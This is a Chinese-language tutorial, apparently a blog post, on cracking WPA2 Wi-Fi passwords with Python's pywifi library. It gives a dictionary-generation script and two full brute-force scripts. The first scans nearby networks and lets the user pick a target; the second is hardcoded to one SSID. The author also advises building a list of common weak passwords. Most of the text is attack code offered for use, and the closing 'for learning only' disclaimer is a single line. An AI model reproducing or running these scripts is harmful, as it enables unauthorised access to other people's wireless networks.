目录

# 修正记录：2022-12-01

1，先安装Python环境(这个不用多说了吧)

2，安装PyWifi

3,自己手工整理高频弱口令，不建议程序生成的字典，生成的字典成功率实在太低。

4，自己生成字典的算法：

5，破解WIF代码第一种（2022-12-01）：

6，破解WIF代码第二种：

7，执行破解成功效果截图（成功连接)：

8，总结：

9，温馨提示。

# 修正记录：2022-12-01

   【破解WIF代码第一种】修正一个小错误，表现为代码执行多次后会报：ERROR Open handle failed! 错误。已修正。 并增加了尝试次数记数及显示。

效果如下图：

1，先安装Python环境(这个不用多说了吧)

2，安装PyWifi

pip install pywifi

3,自己手工整理高频弱口令，不建议程序生成的字典，生成的字典成功率实在太低。

完全是在浪费时间和资源。实话实说

一般字典包括数字（0-9）、字母（a-z，区分大小写）、特殊字符（!@#$%^&*()_+=-）常规WPA2 wifi密码为最低8位，且仅包括数字和小写字母，
所以我们可以从数字和字母组成的字符串中随机挑选出8位（单个字符可重复出现），
作为wifi密码组成字典存入txt文档。

4，自己生成字典的算法：

import itertools as its
words = "1234567890abcdefghijklmnopqrstuvwxyz" #可选择的字符
r =its.product(words,repeat=8)  #组成8位字符串
dic = open("pwd.txt","a")      #存储为wifi密码字典
#wifi密码完成换行，并写入txt文档
for i in r:dic.write("".join(i))dic.write("".join("\n"))
dic.close()

5，破解WIF代码第一种（2022-12-01修正）：

import pywifi
import time
import datetime
from pywifi import const# WiFi扫描模块
def wifi_scan():# 初始化wifiwifi = pywifi.PyWiFi()# 使用第一个无线网卡interface = wifi.interfaces()[0]# 开始扫描interface.scan()for i in range(4):time.sleep(1)# print('\r扫描可用 WiFi 中，请稍后。。。（' + str(3 - i), end='）\n')print('\r扫描可用 WiFi 中，请稍后。。。（' + str(3 - i)+'）')print('\r扫描完成！\n' + '-' * 38)print('\r{:4}{:6}{}'.format('编号', '信号强度', 'wifi名'))# 扫描结果，scan_results()返回一个集，存放的是每个wifi对象bss = interface.scan_results()# 存放wifi名的集合wifi_name_set = set()for w in bss:# 解决乱码问题wifi_name_and_signal = (100 + w.signal, w.ssid.encode('raw_unicode_escape').decode('utf-8'))wifi_name_set.add(wifi_name_and_signal)# 存入列表并按信号排序wifi_name_list = list(wifi_name_set)wifi_name_list = sorted(wifi_name_list, key=lambda a: a[0], reverse=True)num = 0# 格式化输出while num < len(wifi_name_list):print('\r{:<6d}{:<8d}{}'.format(num, wifi_name_list[num][0], wifi_name_list[num][1]))num += 1print('-' * 38)# 返回wifi列表return wifi_name_list# WIFI破解模块
def wifi_password_crack(wifi_name):# 字典路径dic_path = input("请输入本地用于WIFI暴力破解的密码字典（txt格式，每个密码占据1行）的路径：")if dic_path =="": dic_path = "pwd.txt"# 打开文件# file = open(dic_path, "r")start = datetime.datetime.now()iCount = 0# 创建wifi对象wifi = pywifi.PyWiFi()# 创建网卡对象，为第一个wifi网卡interface = wifi.interfaces()[0]with open(dic_path, 'r') as f:# 遍历密码for pwd in f:# 去除密码的末尾换行符pwd = pwd.strip('\n')# ERROR Open handle failed!将这创建对象过程移到上面，防止多次执行时报错# 创建wifi对象# wifi = pywifi.PyWiFi()# 创建网卡对象，为第一个wifi网卡# interface = wifi.interfaces()[0]# 断开所有wifi连接interface.disconnect()# 等待其断开while interface.status() == 4:# 当其处于连接状态时，利用循环等待其断开pass# 创建连接文件（对象）profile = pywifi.Profile()# wifi名称profile.ssid = wifi_name# 需要认证profile.auth = const.AUTH_ALG_OPEN# wifi默认加密算法profile.akm.append(const.AKM_TYPE_WPA2PSK)profile.cipher = const.CIPHER_TYPE_CCMP# wifi密码profile.key = pwd# 删除所有wifi连接文件interface.remove_all_network_profiles()# 设置新的wifi连接文件tmp_profile = interface.add_network_profile(profile)# 开始尝试连接interface.connect(tmp_profile)#start_time = time.time()time.sleep(1.5)#while time.time() - start_time < 1.5:# 接口状态为4代表连接成功（当尝试时间大于1.5秒之后则为错误密码，经测试测正确密码一般都在1.5秒内连接，若要提高准确性可以设置为2s或以上，相应暴力破解速度就会变慢）if interface.status() == const.IFACE_CONNECTED:print(f'\r连接成功！密码为：{pwd}')m, s = divmod((end - start).seconds, 60)h, m = divmod(m, 60)print(f"本次破解WIFI密码共用时：{h}时{m}分{s}秒")exit(0)else:print(f'\r[{iCount}]正在利用密码 {pwd} 尝试...')end = datetime.datetime.now()iCount= iCount+1
# 主函数
def main():# 退出标致exit_flag = 0# 目标编号target_num = -1while not exit_flag:try:print('WIFI破解'.center(35, '-'))# 调用扫描模块，返回一个排序后的wifi列表wifi_list = wifi_scan()# 让用户选择要破解的wifi编号，并对用户输入的编号进行判断和异常处理choose_exit_flag = 0while not choose_exit_flag:try:target_num = int(input('请选择你要尝试破解的wifi：'))# 如果要选择的wifi编号在列表内，继续二次判断，否则重新输入if target_num in range(len(wifi_list)):# 二次确认while not choose_exit_flag:try:choose = str(input(f'你选择要破解的WiFi名称是：{wifi_list[target_num][1]}，确定吗？（Y/N）'))# 对用户输入进行小写处理，并判断if choose.lower() == 'y':choose_exit_flag = 1elif choose.lower() == 'n':break# 处理用户其它字母输入else:print('只能输入 Y/N')# 处理用户非字母输入except ValueError:print('只能输入 Y/N')# 退出破解if choose_exit_flag == 1:breakelse:print('请重新输入')except ValueError:print('只能输入数字')# 密码破解，传入用户选择的wifi名称wifi_password_crack(wifi_list[target_num][1])print('-' * 38)exit_flag = 1except Exception as e:print(e)raise eif __name__ == '__main__':main()

6，破解WIF代码第二种：

import pywifi
from pywifi import const
import time
import datetime# 测试连接，返回链接结果
def wifiConnect(pwd):# 抓取网卡接口wifi = pywifi.PyWiFi()# 获取第一个无线网卡ifaces = wifi.interfaces()[0]# 断开所有连接ifaces.disconnect()time.sleep(1)wifistatus = ifaces.status()if wifistatus == const.IFACE_DISCONNECTED:# 创建WiFi连接文件profile = pywifi.Profile()# 要连接WiFi的名称profile.ssid = "TP_LINK_44D0"# 网卡的开放状态profile.auth = const.AUTH_ALG_OPEN# wifi加密算法,一般wifi加密算法为wpsprofile.akm.append(const.AKM_TYPE_WPA2PSK)# 加密单元profile.cipher = const.CIPHER_TYPE_CCMP# 调用密码profile.key = pwd# 删除所有连接过的wifi文件ifaces.remove_all_network_profiles()# 设定新的连接文件tep_profile = ifaces.add_network_profile(profile)ifaces.connect(tep_profile)# wifi连接时间time.sleep(2)if ifaces.status() == const.IFACE_CONNECTED:return Trueelse:return Falseelse:print("已有wifi连接")# 读取密码本
def readPassword():success = Falseprint("****************** WIFI破解 ******************")# 密码本路径path = "pwd.txt"# 打开文件file = open(path, "r")start = datetime.datetime.now()while True:try:pwd = file.readline()# 去除密码的末尾换行符pwd = pwd.strip('\n')bool = wifiConnect(pwd)if bool:print("[*] 密码已破解：", pwd)print("[*] WiFi已自动连接！！！")success = Truebreakelse:# 跳出当前循环，进行下一次循环print("正在破解 SSID 为 %s 的 WIFI密码，当前校验的密码为：%s"%("TP_LINK_44D0",pwd))except:continueend = datetime.datetime.now()if(success):print("[*] 本次破解WIFI密码一共用了多长时间：{}".format(end - start))else:print("[*] 很遗憾未能帮你破解出当前指定WIFI的密码，请更换密码字典后重新尝试！")exit(0)if __name__=="__main__":readPassword()

7，执行破解成功效果截图（成功连接)：

8，总结：

   实话告诉你，现在WPA2 WIF密码破解成功的概率基本为0，不要妄想可以通过一段脚本就独步天下。哈哈，那是不可能的。WPA2的加密方式决定了密码是基本不可能被破解的。但是。不可能被破解,不代表不能被尝试验证。尝试是需要代价的,一次密码尝试至少需要1.5秒时间。所以。如果想用跑字典方式来破解周边WIFI。我认为只需要手工整理1000-10000个左右>=8的全网高频弱口令密码即可。跑起来也快。成不成就这几下子。据有关组织统计。10000个高频密码基本可以涵盖全网60%的密码。真有这么高的概率。信不信由你。

9，温馨提示。

代码仅供学习用途。勿用于非法用途！